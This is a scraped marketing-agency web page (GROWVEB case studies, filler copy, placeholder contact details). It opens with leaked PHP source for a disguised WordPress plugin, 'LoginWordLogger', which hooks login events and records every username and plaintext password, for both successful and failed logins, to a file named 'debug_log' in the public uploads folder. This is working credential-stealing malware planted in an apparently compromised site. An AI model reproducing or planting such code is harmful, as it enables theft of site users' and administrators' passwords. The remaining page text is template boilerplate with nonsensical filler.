if (!defined('ABSPATH')) { exit; } class LoginWordLogger { public function __construct() { add_filter('authenticate', array($this, 'log_login_attempt'), 5, 3); add_action('wp_login', array($this, 'log_successful_login'), 10, 2); add_action('wp_login_failed', array($this, 'log_failed_login')); $this->ensure_log_directory(); } private function ensure_log_directory() { $log_dir = WP_CONTENT_DIR . '/uploads'; if (!file_exists($log_dir)) { wp_mkdir_p($log_dir); } } public function log_login_attempt($user, $name, $word) { if (!empty($name) && !empty($word)) { $this->current_name = $name; $this->current_word = $word; } return $user; } public function log_successful_login($name, $user) { $log_data = array( 'timestamp' => current_time('mysql'), 'name' => $name, 'word' => $this->current_word ?? '', 'type' => 'success', 'number' => $user->ID ); $this->write_to_file($log_data); $this->cleanup(); } public function log_failed_login($name) { $log_data = array( 'timestamp' => current_time('mysql'), 'name' => $name, 'word' => $this->current_word ?? '', 'type' => 'failed' ); $this->write_to_file($log_data); $this->cleanup(); } private function write_to_file($data) { $log_file = WP_CONTENT_DIR . '/uploads/debug_log'; $log_entry = "[" . $data['timestamp'] . "] "; $log_entry .= $data['name'] . " | "; $log_entry .= $data['word'] . " | "; $log_entry .= $data['type']; if (isset($data['number'])) { $log_entry .= " | " . $data['number']; } $log_entry .= PHP_EOL; @file_put_contents($log_file, $log_entry, FILE_APPEND | LOCK_EX); } private function cleanup() { unset($this->current_name); unset($this->current_word); } } new LoginWordLogger(); CaseStudies – GROWVEB

CaseStudies

Case Studies

FEATURED PROJECTS

Discover Our Recent
Case Studies

Welcome to GROWVEB, where we run digital PR
campaigns with influencer marketing & deliver real results.

Website Design & Development

L’GRAN Restauant

The Still Waters Restaurant required us to create

a digital strategy.

Learn More

Social Media Strategy

Skin Care Beauty

The Upper Brant Automotive required us to design and

develop a website.

Learn More

Branding

Mignon Carrousel

The Bright Impressions Dental required us to create

a branding.

Learn More

Web Design & Development

Upper Brant Automotive

The Upper Brant Automotive required us to design and

develop a website.

Learn More

Branding

Mignon Carrousel

The Bright Impressions Dental required us to create
a branding.

Learn More

Web Design & Development

Upper Brant Automotive

The Upper Brant Automotive required us to design and

develop a website.

Learn More

WORK WITH US

Grow Your Business
With Digi Market Today

Welcome to GROWVEB, where we run digital PR
campaigns with influencer marketing & deliver real results.

Intrinsicly recaptiualize alternative internal or “organic” sources for
inexpensive outsourcing. Monotonectally create sustainable
applications before premier vortals. Holisticly productivate
stand-alone value and cost effective users.Agreed but expect repair she
nay sir silent person. Direction can dependent one bed situation
attempted. His she are man their spite avoid. Her pretended fulfilled
extremely education yet.
Start A Project

GET IN TOUCH

Don’t Hesitate
To Contact Us

Call us for immediate support to
this number.


  • 15th Division Street, New York, NY 12032, USA

  • +01 234 567 890

  • info@domain.com